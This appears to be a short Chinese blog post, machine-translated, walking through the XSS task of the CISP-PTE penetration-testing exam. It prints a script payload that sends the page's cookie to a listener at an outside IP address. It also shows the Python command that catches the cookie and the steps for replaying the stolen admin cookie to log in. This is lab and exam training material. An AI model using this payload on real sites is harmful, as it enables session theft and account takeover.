cisp-pte xss考題

2023年7月20日#渗透测试 #考证350

AI 翻譯

這篇文章透過AI由簡體中文翻譯成繁體中文。查看原文

AI 生成的摘要

XSS攻擊主要是通過獲取管理員的cookie，然後偽造管理員的cookie進行登錄。攻擊步驟包括準備XSS payload、開啟web服務、將payload寫入輸入框、提交查詢、等待Python接收cookie、複製cookie、替換cookie值、刷新界面並成功登錄。

Xss 內容主要的考點是在獲取管理員的 cookie，然後偽造管理員的 cookie 進行登錄。

界面如下

點擊上圖中的 Test 可進行留言

準備獲取 cookie 的 xss payload

<script>
document.write('<img src="http://10.1.12.135:8889?'+ escape(document.cookie) + '">')
</script>

開啟 web 服務，接收 cookie

Python -m SimpleHTTPServer 8889

將 payload 寫入輸入框

點擊提交查詢

等待

查看 python 是否接收到 cookie

將 cookie 複製下來

1acb0fb952b3caaf1ab7277511923138

將 cookie 值替換掉

點擊 Edit 進行替換

刷新界面，點擊 Admin

成功登錄，獲取到 key

wps10